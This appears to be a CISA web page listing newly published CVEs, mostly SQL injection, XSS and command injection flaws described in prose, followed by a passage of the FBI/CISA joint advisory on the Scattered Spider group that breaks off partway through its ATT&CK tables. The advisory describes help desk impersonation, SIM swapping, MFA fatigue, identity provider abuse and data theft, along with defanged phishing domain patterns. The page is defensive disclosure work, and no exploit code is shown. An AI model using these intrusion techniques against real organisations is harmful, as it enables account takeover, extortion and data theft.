phpgurukul — restaurant_table_booking_system A vulnerability was found in PHPGurukul Restaurant Table Booking System 1.0. It has been rated as critical. This issue affects some unknown processing of the file check-status.php of the component Booking Reservation Handler. The manipulation leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-244943. 2023-11-10 not yet calculated CVE-2023-6074
 
phpgurukul — restaurant_table_booking_system A vulnerability classified as problematic has been found in PHPGurukul Restaurant Table Booking System 1.0. Affected is an unknown function of the file index.php of the component Reservation Request Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-244944. 2023-11-10 not yet calculated CVE-2023-6075
 
phpgurukul — restaurant_table_booking_system A vulnerability classified as problematic was found in PHPGurukul Restaurant Table Booking System 1.0. Affected by this vulnerability is an unknown functionality of the file booking-details.php of the component Reservation Status Handler. The manipulation of the argument bid leads to information disclosure. The attack can be launched remotely. The identifier VDB-244945 was assigned to this vulnerability. 2023-11-10 not yet calculated CVE-2023-6076
 
piccolo — piccolo Piccolo is an object-relational mapping and query builder which supports asyncio. Prior to version 1.1.1, the handling of named transaction `savepoints` in all database implementations is vulnerable to SQL Injection via f-strings. While the likelihood of an end developer exposing a `savepoints` `name` parameter to a user is highly unlikely, it would not be unheard of. If a malicious user was able to abuse this functionality, they would have essentially direct access to the database and the ability to modify data to the level of permissions associated with the database user. A non-exhaustive list of actions possible based on database permissions is: Read all data stored in the database, including usernames and password hashes; insert arbitrary data into the database, including modifying existing records; and gain a shell on the underlying server. Version 1.1.1 fixes this issue. 2023-11-10 not yet calculated CVE-2023-47128
 
prestashop — blockreassurance PrestaShop blockreassurance adds an information block aimed at offering helpful information to reassure customers that the store is trustworthy. When adding a block in blockreassurance module, a BO user can modify the http request and give the path of any file in the project instead of an image. When deleting the block from the BO, the file will be deleted. It is possible to make the website completely unavailable by removing index.php for example. This issue has been patched in version 5.1.4. 2023-11-08 not yet calculated CVE-2023-47109

 

projectworlds — online_job_portal Online Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘filename’ parameter of the sign-up.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-11-07 not yet calculated CVE-2023-46676
 
projectworlds — online_job_portal Online Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txt_uname’ parameter of the sign-up.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-11-07 not yet calculated CVE-2023-46677
 
projectworlds — online_job_portal Online Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txt_upass’ parameter of the sign-up.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-11-07 not yet calculated CVE-2023-46678
 
projectworlds — online_job_portal Online Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txt_uname_email’ parameter of the index.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-11-07 not yet calculated CVE-2023-46679
 
projectworlds — online_matrimonial_project Online Matrimonial Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘password’ parameter of the auth/auth.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-11-07 not yet calculated CVE-2023-46786
 
projectworlds — online_matrimonial_project Online Matrimonial Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘username’ parameter of the auth/auth.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-11-07 not yet calculated CVE-2023-46787
 
projectworlds — online_matrimonial_project Online Matrimonial Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘id’ parameter in the ‘uploadphoto()’ function of the functions.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-11-07 not yet calculated CVE-2023-46788
 
projectworlds — online_matrimonial_project Online Matrimonial Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘filename’ attribute of the ‘pic1’ multipart parameter of the functions.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-11-07 not yet calculated CVE-2023-46789
 
projectworlds — online_matrimonial_project Online Matrimonial Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘filename’ attribute of the ‘pic2’ multipart parameter of the functions.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-11-07 not yet calculated CVE-2023-46790
 
projectworlds — online_matrimonial_project Online Matrimonial Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘filename’ attribute of the ‘pic4’ multipart parameter of the functions.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-11-07 not yet calculated CVE-2023-46792
 
projectworlds — online_matrimonial_project Online Matrimonial Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘day’ parameter in the ‘register()’ function of the functions.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-11-07 not yet calculated CVE-2023-46793
 
projectworlds — online_matrimonial_project Online Matrimonial Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ’email’ parameter in the ‘register()’ function of the functions.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-11-07 not yet calculated CVE-2023-46794
 
projectworlds — online_matrimonial_project Online Matrimonial Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘gender’ parameter in the ‘register()’ function of the functions.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-11-07 not yet calculated CVE-2023-46795
 
projectworlds — online_matrimonial_project Online Matrimonial Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘month’ parameter in the ‘register()’ function of the functions.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-11-07 not yet calculated CVE-2023-46796
 
projectworlds — online_matrimonial_project Online Matrimonial Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘name’ parameter in the ‘register()’ function of the functions.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-11-07 not yet calculated CVE-2023-46797
 
projectworlds — online_matrimonial_project Online Matrimonial Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘year’ parameter in the ‘register()’ function of the functions.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-11-07 not yet calculated CVE-2023-46799
 
projectworlds — online_matrimonial_project Online Matrimonial Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘id’ parameter of the view_profile.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-11-07 not yet calculated CVE-2023-46800
 
qnap_systems_inc. — multiple_products
 
An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.0.1.2376 build 20230421 and later QuTS hero h5.0.1.2376 build 20230421 and later QuTScloud c5.1.0.2498 and later. 2023-11-10 not yet calculated CVE-2023-23367
qnap_systems_inc. — qumagie A SQL injection vulnerability has been reported to affect QuMagie. If exploited, the vulnerability could allow authenticated users to inject malicious code via a network. We have already fixed the vulnerability in the following version: QuMagie 2.1.4 and later 2023-11-10 not yet calculated CVE-2023-41284
qnap_systems_inc. — qumagie
 
An OS command injection vulnerability has been reported to affect QuMagie. If exploited, the vulnerability could allow authenticated users to execute commands via a network. We have already fixed the vulnerability in the following version: QuMagie 2.1.3 and later 2023-11-10 not yet calculated CVE-2023-39295
qnap_systems_inc. — qumagie
 
A SQL injection vulnerability has been reported to affect QuMagie. If exploited, the vulnerability could allow authenticated users to inject malicious code via a network. We have already fixed the vulnerability in the following version: QuMagie 2.1.4 and later 2023-11-10 not yet calculated CVE-2023-41285
sentry — sentry-javascript
 
sentry-javascript provides Sentry SDKs for JavaScript. An unsanitized input of Next.js SDK tunnel endpoint allows sending HTTP requests to arbitrary URLs and reflecting the response back to the user. This issue only affects users who have Next.js SDK tunneling feature enabled. The problem has been fixed in version 7.77.0. 2023-11-10 not yet calculated CVE-2023-46729

 

solarwinds_ — network_configuration_manager
 
The Network Configuration Manager was susceptible to a Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows a low-level user to perform the actions with SYSTEM privileges. We found this issue was not resolved in CVE-2023-33226 2023-11-09 not yet calculated CVE-2023-40054
 
solarwinds_ — network_configuration_manager
 
The Network Configuration Manager was susceptible to a Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows a low-level user to perform the actions with SYSTEM privileges. We found this issue was not resolved in CVE-2023-33227 2023-11-09 not yet calculated CVE-2023-40055
spiceworks — help_desk_server
 
An issue was discovered in Spiceworks Help Desk Server before 1.3.3. A Blind Boolean SQL injection vulnerability within the order_by_for_ticket function in app/models/reporting/database_query.rb allows an authenticated attacker to execute arbitrary SQL commands via the sort parameter. This can be leveraged to leak local files from the host system, leading to remote code execution (RCE) through deserialization of malicious data. 2023-11-09 not yet calculated CVE-2021-43609

 

statmic — statmic Statmic is a core Laravel content management system Composer package. Prior to versions 3.4.13 and 4.33.0, on front-end forms with an asset upload field, PHP files crafted to look like images may be uploaded. This only affects forms using the “Forms” feature and not just _any_ arbitrary form. This does not affect the control panel. This issue has been patched in 3.4.13 and 4.33.0. 2023-11-10 not yet calculated CVE-2023-47129

 

symfony — symfony
 
Symfony is a PHP framework for web and console applications and a set of reusable PHP components. Starting in versions 5.4.21 and 6.2.7 and prior to versions 5.4.31 and 6.3.8, `SessionStrategyListener` does not migrate the session after every successful login. It does so only in case the logged in user changes by means of checking the user identifier. In some use cases, the user identifier doesn’t change between the verification phase and the successful login, while the token itself changes from one type (partially-authenticated) to another (fully-authenticated). When this happens, the session id should be regenerated to prevent possible session fixations, which is not the case at the moment. As of versions 5.4.31 and 6.3.8, Symfony now checks the type of the token in addition to the user identifier before deciding whether the session id should be regenerated. 2023-11-10 not yet calculated CVE-2023-46733

 

symfony — symfony
 
Symfony is a PHP framework for web and console applications and a set of reusable PHP components. Starting in versions 2.0.0, 5.0.0, and 6.0.0 and prior to versions 4.4.51, 5.4.31, and 6.3.8, some Twig filters in CodeExtension use `is_safe=html` but don’t actually ensure their input is safe. As of versions 4.4.51, 5.4.31, and 6.3.8, Symfony now escapes the output of the affected filters. 2023-11-10 not yet calculated CVE-2023-46734

 

symfony — symfony
 
Symfony is a PHP framework for web and console applications and a set of reusable PHP components. Starting in version 6.0.0 and prior to version 6.3.8, the error message in `WebhookController` returns unescaped user-submitted input. As of version 6.3.8, `WebhookController` now doesn’t return any user-submitted input in its response. 2023-11-10 not yet calculated CVE-2023-46735
 
telit_cinterion — multiple_products A CWE-120: Buffer Copy without Checking Size of Input vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81, Telit Cinterion PLS62 that could allow a remote unauthenticated attacker to execute arbitrary code on the targeted system by sending a specially crafted SMS message. 2023-11-09 not yet calculated CVE-2023-47610
telit_cinterion — multiple_products A CWE-269: Improper Privilege Management vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81, Telit Cinterion PLS62 that could allow a local, low privileged attacker to elevate privileges to “manufacturer” level on the targeted system. 2023-11-10 not yet calculated CVE-2023-47611
telit_cinterion — multiple_products A CWE-552: Files or Directories Accessible to External Parties vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81, Telit Cinterion PLS62 that could allow an attacker with physical access to the target system to obtain a read/write access to any files and directories on the targeted system, including hidden files and directories. 2023-11-09 not yet calculated CVE-2023-47612
telit_cinterion — multiple_products A CWE-23: Relative Path Traversal vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81, Telit Cinterion PLS62 that could allow a local, low privileged attacker to escape from virtual directories and get read/write access to protected files on the targeted system. 2023-11-09 not yet calculated CVE-2023-47613
telit_cinterion — multiple_products A CWE-200: Exposure of Sensitive Information to an Unauthorized Actor vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81, Telit Cinterion PLS62 that could allow a local, low privileged attacker to disclose hidden virtual paths and file names on the targeted system. 2023-11-10 not yet calculated CVE-2023-47614
telit_cinterion — multiple_products A CWE-526: Exposure of Sensitive Information Through Environmental Variables vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81, Telit Cinterion PLS62 that could allow a local, low privileged attacker to get access to a sensitive data on the targeted system. 2023-11-09 not yet calculated CVE-2023-47615
telit_cinterion — multiple_products A CWE-200: Exposure of Sensitive Information to an Unauthorized Actor vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81, Telit Cinterion PLS62 that could allow an attacker with physical access to the target system to get access to a sensitive data on the targeted system. 2023-11-09 not yet calculated CVE-2023-47616
tibco_software_inc. — spotfire
 
The Spotfire Connectors component of TIBCO Software Inc.’s Spotfire Analyst, Spotfire Server, and Spotfire for AWS Marketplace contains an easily exploitable vulnerability that allows a low privileged attacker with read/write access to craft malicious Analyst files. A successful attack using this vulnerability requires human interaction from a person other than the attacker. Affected releases are TIBCO Software Inc.’s Spotfire Analyst: versions 12.3.0, 12.4.0, and 12.5.0, Spotfire Server: versions 12.3.0, 12.4.0, and 12.5.0, and Spotfire for AWS Marketplace: version 12.5.0. 2023-11-08 not yet calculated CVE-2023-26221
tongda — oa A vulnerability classified as critical has been found in Tongda OA 2017 up to 11.9. Affected is an unknown function of the file general/system/censor_words/module/delete.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-244872. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-11-09 not yet calculated CVE-2023-6052

 

tongda — oa A vulnerability, which was classified as critical, has been found in Tongda OA 2017 up to 11.9. Affected by this issue is some unknown functionality of the file general/system/censor_words/manage/delete.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. VDB-244874 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-11-09 not yet calculated CVE-2023-6053

 

tongda — oa A vulnerability, which was classified as critical, was found in Tongda OA 2017 up to 11.9. This affects an unknown part of the file general/wiki/cp/manage/lock.php. The manipulation of the argument TERM_ID_STR leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-244875. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-11-09 not yet calculated CVE-2023-6054

 

volkswagen — id.3 Attacker can perform a Denial-of-Service attack to crash the ICAS 3 IVI ECU in a Volkswagen ID.3 (and other vehicles of the VW Group with the same hardware) and spoof volume setting commands to irreversibly turn on audio volume to maximum via REST API calls. 2023-11-10 not yet calculated CVE-2023-6073
wbce_cms — wbce_cms
 
SQL injection vulnerability in the miniform module in WBCE CMS v.1.6.0 allows remote unauthenticated attacker to execute arbitrary code via the DB_RECORD_TABLE parameter. 2023-11-10 not yet calculated CVE-2023-39796

 

wildfly-core — wildfly-core
 
A flaw was found in wildfly-core. A management user could use the resolve-expression in the HAL Interface to read possible sensitive information from the Wildfly system. This issue could allow a malicious user to access the system and obtain possible sensitive information from the system. 2023-11-08 not yet calculated CVE-2023-4061

 

wordpress — wordpress
 
Cross-Site Request Forgery (CSRF) vulnerability in ReCorp Export WP Page to Static HTML/CSS plugin <= 2.1.9 versions. 2023-11-10 not yet calculated CVE-2023-31077
xwiki — xwiki
 
application-collabora is an integration of Collabora Online in XWiki. As part of the application use cases, depending on the rights that a user has over a document, they should be able to open the office attachments files in view or edit mode. Currently, if a user opens an attachment file in edit mode in collabora, this right will be preserved for all future users, until the editing session is closes, even if some of them have only view right. Collabora server is the one issuing this request and it seems that the `userCanWrite` query parameter is cached, even if, for example, token is not. This issue has been patched in version 1.3. 2023-11-09 not yet calculated CVE-2023-46743
yugabytedb — yugabytedb_anywhere Prometheus metrics are available without authentication. These metrics expose detailed and sensitive information about the YugabyteDB Anywhere environment. 2023-11-08 not yet calculated CVE-2023-6001
zitadel — zitadel ZITADEL provides identity infrastructure. ZITADEL provides administrators the possibility to define a `Lockout Policy` with a maximum amount of failed password check attempts. On every failed password check, the number of failed checks is compared against the configured maximum. Exceeding the limit, will lock the user and prevent further authentication. In the affected implementation it was possible for an attacker to start multiple parallel password checks, giving him the possibility to try out more combinations than configured in the `Lockout Policy`. This vulnerability has been patched in versions 2.40.5 and 2.38.3. 2023-11-08 not yet calculated CVE-2023-47111

 

zyxel — gs1900-24ep The improper privilege management vulnerability in the Zyxel GS1900-24EP switch firmware version V2.70(ABTO.5) could allow an authenticated local user with read-only access to modify system settings on a vulnerable device. 2023-11-07 not yet calculated CVE-2023-35140

Back to top

Categories
alerts

Citrix Releases Security Updates for Citrix Hypervisor

Citrix has released security updates addressing vulnerabilities in Citrix Hypervisor 8.2 CU1 LTSR. A cyber threat actor could exploit these vulnerabilities to take control of an affected system.

CISA encourages users and administrators to review Citrix Hypervisor Security Bulletin for CVE-2023-23583 and CVE-2023-46835 and apply the necessary updates.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Categories
alerts

FBI and CISA Release Advisory on Scattered Spider Group

Today, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) released a joint Cybersecurity Advisory (CSA) on Scattered Spider—a cybercriminal group targeting commercial facilities sectors and subsectors. The advisory provides tactics, techniques, and procedures (TTPs) obtained through FBI investigations as recently as November 2023.

Scattered Spider threat actors typically engage in data theft for extortion using multiple social engineering techniques and have recently leveraged BlackCat/ALPHV ransomware alongside their usual TTPs.

FBI and CISA encourage network defenders and critical infrastructure organizations to review the joint CSA for recommended mitigations to reduce the likelihood and impact of a cyberattack by Scattered Spider actors. For more information, visit StopRansomware and see the updated #StopRansomware Guide.

Categories
alerts

Scattered Spider

SUMMARY

The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) in response to recent activity by Scattered Spider threat actors against the commercial facilities sectors and subsectors. This advisory provides tactics, techniques, and procedures (TTPs) obtained through FBI investigations as recently as November 2023.

Scattered Spider is a cybercriminal group that targets large companies and their contracted information technology (IT) help desks. Scattered Spider threat actors, per trusted third parties, have typically engaged in data theft for extortion and have also been known to utilize BlackCat/ALPHV ransomware alongside their usual TTPs.

The FBI and CISA encourage critical infrastructure organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of a cyberattack by Scattered Spider actors.

Download the PDF version of this report:

A23-320A Scattered Spider
(PDF, 517.03 KB
)

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 14. See the MITRE ATT&CK® Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Overview

Scattered Spider (also known as Starfraud, UNC3944, Scatter Swine, and Muddled Libra) engages in data extortion and several other criminal activities.[1] Scattered Spider threat actors are considered experts in social engineering and use multiple social engineering techniques, especially phishing, push bombing, and subscriber identity module (SIM) swap attacks, to obtain credentials, install remote access tools, and/or bypass multi-factor authentication (MFA). According to public reporting, Scattered Spider threat actors have [2],[3],[4]:

  • Posed as company IT and/or helpdesk staff using phone calls or SMS messages to obtain credentials from employees and gain access to the network [T1598],[T1656].
  • Posed as company IT and/or helpdesk staff to direct employees to run commercial remote access tools enabling initial access [T1204],[T1219],[T1566].
  • Posed as IT staff to convince employees to share their one-time password (OTP), an MFA authentication code.
  • Sent repeated MFA notification prompts leading to employees pressing the “Accept” button (also known as MFA fatigue) [T1621].[5]
  • Convinced cellular carriers to transfer control of a targeted user’s phone number to a SIM card they controlled, gaining control over the phone and access to MFA prompts.
  • Monetized access to victim networks in numerous ways including extortion enabled by ransomware and data theft [T1657].

After gaining access to networks, FBI observed Scattered Spider threat actors using publicly available, legitimate remote access tunneling tools. Table 1 details a list of legitimate tools Scattered Spider, repurposed and used for their criminal activity. Note: The use of these legitimate tools alone is not indicative of criminal activity. Users should review the Scattered Spider indicators of compromise (IOCs) and TTPs discussed in this CSA to determine whether they have been compromised.

Table 1: Legitimate Tools Used by Scattered Spider

Tool

Intended Use

Fleetdeck.io

Enables remote monitoring and management of systems.

Level.io

Enables remote monitoring and management of systems.

Mimikatz [S0002]

Extracts credentials from a system.

Ngrok [S0508]

Enables remote access to a local web server by tunneling over the internet.

Pulseway

Enables remote monitoring and management of systems.

Screenconnect

Enables remote connections to network devices for management.

Splashtop

Enables remote connections to network devices for management.

Tactical.RMM

Enables remote monitoring and management of systems.

Tailscale

Provides virtual private networks (VPNs) to secure network communications.

Teamviewer

Enables remote connections to network devices for management.

In addition to using legitimate tools, Scattered Spider also uses malware as part of its TTPs. See Table 2 for some of the malware used by Scattered Spider.

Table 2: Malware Used by Scattered Spider

Malware

Use

AveMaria (also known as WarZone [S0670])

Enables remote access to a victim’s systems.

Raccoon Stealer

Steals information including login credentials [TA0006], browser history [T1217], cookies [T1539], and other data.

VIDAR Stealer

Steals information including login credentials, browser history, cookies, and other data.

Scattered Spider threat actors have historically evaded detection on target networks by using living off the land techniques and allowlisted applications to navigate victim networks, as well as frequently modifying their TTPs.

Observably, Scattered Spider threat actors have exfiltrated data [TA0010] after gaining access and threatened to release it without deploying ransomware; this includes exfiltration to multiple sites including U.S.-based data centers and MEGA[.]NZ [T1567.002].

Recent Scattered Spider TTPs

New TTP – File Encryption

More recently, the FBI has identified Scattered Spider threat actors now encrypting victim files after exfiltration [T1486]. After exfiltrating and/or encrypting data, Scattered Spider threat actors communicate with victims via TOR, Tox, email, or encrypted applications.

Reconnaissance, Resource Development, and Initial Access

Scattered Spider intrusions often begin with broad phishing [T1566] and smishing [T1660] attempts against a target using victim-specific crafted domains, such as the domains listed in Table 3 [T1583.001].

Table 3: Domains Used by Scattered Spider Threat Actors

Domains

victimname-sso[.]com

victimname-servicedesk[.]com

victimname-okta[.]com

In most instances, Scattered Spider threat actors conduct SIM swapping attacks against users that respond to the phishing/smishing attempt. The threat actors then work to identify the personally identifiable information (PII) of the most valuable users that succumbed to the phishing/smishing, obtaining answers for those users’ security questions. After identifying usernames, passwords, PII [T1589], and conducting SIM swaps, the threat actors then use social engineering techniques [T1656] to convince IT help desk personnel to reset passwords and/or MFA tokens [T1078.002],[T1199],[T1566.004] to perform account takeovers against the users in single sign-on (SSO) environments.

Execution, Persistence, and Privilege Escalation

Scattered Spider threat actors then register their own MFA tokens [T1556.006],[T1606] after compromising a user’s account to establish persistence [TA0003]. Further, the threat actors add a federated identity provider to the victim’s SSO tenant and activate automatic account linking [T1484.002]. The threat actors are then able to sign into any account by using a matching SSO account attribute. At this stage, the Scattered Spider threat actors already control the identity provider and then can choose an arbitrary value for this account attribute. As a result, this activity allows the threat actors to perform privileged escalation [TA0004] and continue logging in even when passwords are changed [T1078]. Additionally, they leverage common endpoint detection and response (EDR) tools installed on the victim networks to take advantage of the tools’ remote-shell capabilities and executing of commands which elevates their access. They also deploy remote monitoring and management (RMM) tools [T1219] to then maintain persistence.

Discovery, Lateral Movement, and Exfiltration

Once persistence is established on a target network, Scattered Spider threat actors often perform discovery, specifically searching for SharePoint sites [T1213.002], credential storage documentation [T1552.001], VMware vCenter infrastructure [T1018], backups, and instructions for setting up/logging into Virtual Private Networks (VPN) [TA0007]. The threat actors enumerate the victim’s Active Directory (AD), perform discovery and exfiltration of victim’s code repositories [T1213.003], code-signing certificates [T1552.004], and source code [T1083],[TA0010]. Threat actors activate Amazon Web Services (AWS) Systems Manager Inventory [T1538] to discover targets for lateral movement [TA0007],[TA0008], then move to both preexisting [T1021.007] and actor-created [T1578.002] Amazon Elastic Compute Cloud (EC2) instances. In instances where the ultimate goal is data exfiltration, Scattered Spider threat actors use actor-installed extract, transform, and load (ETL) tools [T1648] to bring data from multiple data sources into a centralized database [T1074],[T1530]. According to trusted third parties, where more recent incidents are concerned, Scattered Spider threat actors may have deployed BlackCat/ALPHV ransomware onto victim networks—thereby encrypting VMware Elastic Sky X integrated (ESXi) servers [T1486].

To determine if their activities have been uncovered and maintain persistence, Scattered Spider threat actors often search the victim’s Slack, Microsoft Teams, and Microsoft Exchange online for emails [T1114] or conversations regarding the threat actor’s intrusion and any security response. The threat actors frequently join incident remediation and response calls and teleconferences, likely to identify how security teams are hunting them and proactively develop new avenues of intrusion in response to victim defenses. This is sometimes achieved by creating new identities in the environment [T1136] and is often upheld with fake social media profiles [T1585.001] to backstop newly created identities.

MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 4 through 17 for all referenced threat actor tactics and techniques in this advisory.

Table 4: Reconnaissance

Technique Title

ID

Use

Gather Victim Identity Information

T1589

Scattered Spider threat actors gather usernames, passwords, and PII for targeted organizations.

Phishing for Information

T1598

Scattered Spider threat actors use phishing to obtain login credentials, gaining access to a victim’s network.

Table 5: Resource Development

Technique Title

ID

Use

Acquire Infrastructure: Domains

T1583.001

Scattered Spider threat actors create domains for use in phishing and smishing attempts against targeted organizations.

Establish Accounts: Social Media Accounts

T1585.001

Scattered Spider threat actors create fake social media profiles to backstop newly created user accounts in a targeted organization.

Table 6: Initial Access

Technique Title

ID

Use

Phishing

T1566

Scattered Spider threat actors use broad phishing attempts against a target to obtain information used to gain initial access.

Scattered Spider threat actors have posed as helpdesk personnel to direct employees to install commercial remote access tools.

Phishing (Mobile)

T1660

Scattered Spider threat actors send SMS messages, known as smishing, when targeting a victim.

Phishing: Spearphishing Voice

T1566.004

Scattered Spider threat actors use voice communications to convince IT help desk personnel to reset passwords and/or MFA tokens.

Trusted Relationship

T1199

Scattered Spider threat actors abuse trusted relationships of contracted IT help desks to gain access to targeted organizations.

Valid Accounts: Domain Accounts

T1078.002

Scattered Spider threat actors obtain access to valid domain accounts to gain initial access to a targeted organization.

Table 7: Execution

Technique Title

ID

Use

Serverless Execution

T1648

Scattered Spider threat actors use ETL tools to collect data in cloud environments.

User Execution

T1204

Scattered Spider threat actors impersonating helpdesk personnel direct employees to run commercial remote access tools thereby enabling access to the victim’s network.

Table 8: Persistence

Technique Title

ID

Use

Persistence

TA0003

Scattered Spider threat actors seek to maintain persistence on a targeted organization’s network.

Create Account

T1136

Scattered Spider threat actors create new user identities in the targeted organization.

Modify Authentication Process: Multi-Factor Authentication

T1556.006

Scattered Spider threat actors may modify MFA tokens to gain access to a victim’s network.

Valid Accounts

T1078

Scattered Spider threat actors abuse and control valid accounts to maintain network access even when passwords are changed.

Table 9: Privilege Escalation

Technique Title

ID

Use

Privilege Escalation

TA0004

Scattered Spider threat actors escalate account privileges when on a targeted organization’s network.

Domain Policy Modification: Domain Trust Modification

T1484.002

Scattered Spider threat actors add a federated identify provider to the victim’s SSO tenant and activate automatic account linking.

Table 10: Defense Evasion

Technique Title

ID

Use

Modify Cloud Compute Infrastructure: Create Cloud Instance

T1578.002

Scattered Spider threat actors will create cloud instances for use during lateral movement and data collection.

Impersonation

TA1656

Scattered Spider threat actors pose as company IT and/or helpdesk staff to gain access to victim’s networks.

Scattered Spider threat actors use social engineering to convince IT help desk personnel to reset passwords and/or MFA tokens.

Table 11: Credential Access

Technique Title

ID

Use

Credential Access

TA0006

Scattered Spider threat actors use tools, such as Raccoon Stealer, to obtain login credentials.

Forge Web Credentials

T1606

Scattered Spider threat actors may forge MFA tokens to gain access to a victim’s network.

Multi-Factor Authentication Request Generation

T1621

Scattered Spider sends repeated MFA notification prompts to lead employees to accept the prompt and gain access to the target network.

Unsecured Credentials: Credentials in Files

T1552.001

Scattered Spider threat actors search for insecurely stored credentials on victim’s systems.

Unsecured Credentials: Private Keys

T1552.004

Scattered Spider threat actors search for insecurely stored private keys on victim’s systems.

Table 12: Discovery

Technique Title

ID

Use

Discovery

TA0007

Upon gaining access to a targeted network, Scattered Spider threat actors seek out SharePoint sites, credential storage documentation, VMware vCenter, infrastructure backups and enumerate AD to identify useful information to support further operations.

Browser Information Discovery

T1217

Scattered Spider threat actors use tools (e.g., Raccoon Stealer) to obtain browser histories.

Cloud Service Dashboard

T1538

Scattered Spider threat actors leverage AWS Systems Manager Inventory to discover targets for lateral movement.

File and Directory Discovery

T1083

Scattered Spider threat actors search a compromised network to discover files and directories for further information or exploitation.

Remote System Discovery

T1018

Scattered Spider threat actors search for infrastructure, such as remote systems, to exploit.

Steal Web Session Cookie

T1539

Scattered Spider threat actors use tools, such as Raccoon Stealer, to obtain browser cookies.

Table 13: Lateral Movement

Technique Title

ID

Use

Lateral Movement

TA0008

Scattered Spider threat actors laterally move across a target network upon gaining access and establishing persistence.

Remote Services: Cloud Services

T1021.007

Scattered Spider threat actors use pre-existing cloud instances for lateral movement and data collection.

Table 14: Collection

Technique Title

ID

Use

Data from Information Repositories: Code Repositories

T1213.003

Scattered Spider threat actors search code repositories for data collection and exfiltration.

Data from Information Repositories: Sharepoint

T1213.002

Scattered Spider threat actors search SharePoint repositories for information.

Data Staged

T1074

Scattered Spider threat actors stage data from multiple data sources into a centralized database before exfiltration.

Email Collection

T1114

Scattered Spider threat actors search victim’s emails to determine if the victim has detected the intrusion and initiated any security response.

Data from Cloud Storage

T1530

Scattered Spider threat actors search data in cloud storage for collection and exfiltration.

Table 15: Command and Control

Technique Title

ID

Use

Remote Access Software

T1219

